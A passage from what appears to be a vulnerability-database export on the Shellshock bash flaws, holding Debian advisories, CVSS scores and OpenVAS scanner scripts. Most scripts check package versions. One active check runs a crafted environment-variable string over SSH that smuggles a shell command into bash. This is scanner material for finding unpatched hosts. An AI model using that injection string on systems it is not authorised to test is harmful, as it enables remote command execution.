"2014-09-25T21:18:46", "type": "debian", "title": "[SECURITY] [DSA 3035-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T21:18:46", "id": "DEBIAN:DSA-3035-1:AEAF0", "href": "https://lists.debian.org/debian-security-announce/2014/msg00223.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:25:16", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3032-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nSeptember 24, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-6271\n\nStephane Chazelas discovered a vulnerability in bash, the GNU\nBourne-Again Shell, related to how environment variables are\nprocessed. In many common configurations, this vulnerability is\nexploitable over the network, especially if bash has been configured\nas the system shell.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 4.2+dfsg-0.1+deb7u1.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T14:06:06", "type": "debian", "title": "[SECURITY] [DSA 3032-1] bash security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271"], "modified": "2014-09-24T14:06:06", "id": "DEBIAN:DSA-3032-1:EB739", "href": "https://lists.debian.org/debian-security-announce/2014/msg00220.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882031", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882031\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:09 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos6\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. 
For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-08-02T10:48:56", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2017-07-18T00:00:00", "id": "OPENVAS:703035", "href": "http://plugins.openvas.org/nasl.php?oid=703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 6750 2017-07-18 09:56:47Z teissa $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703035);\n script_version(\"$Revision: 6750 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3035.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bash on Debian Linux\");\n script_tag(name: \"insight\", value: \"Bash is an sh-compatible command language interpreter that executes\ncommands read from the standard input or from a file. 
Bash also\nincorporates useful features from the Korn and C shells (ksh and csh).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name: \"summary\", value: \"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169 \n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS 
Update for bash CESA-2014:1306 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882033\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:17 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. 
An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020591.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_10.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:39", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_02.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802082\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 10:10:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/252743\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2014/09/24/32\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/bash-remote-code-execution-vulnerability-cve-2014-6271\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute 
the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-025\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' /bin/bash -c 'echo id'; cat echo; rm -f /tmp/echo\" | /bin/bash\ncmd = 'echo \"' + \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' \" + bash_cmd + \" -c 'echo id'; cat echo; rm -f /tmp/echo\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( result =~ \"uid=[0-9]+.*gid=[0-9]+.*\" ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "openvas", "title": "RedHat Update for bash RHSA-2014:1306-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871250", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871250", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bash RHSA-2014:1306-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871250\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 06:07:13 +0200 (Fri, 26 Sep 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for bash RHSA-2014:1306-01\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. 
For more information see the referenced Knowledgebase article.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1306-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00053.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", 
rpm:\"bash-debuginfo~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Gentoo Linux Local Security Checks GLSA 201409-10", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", 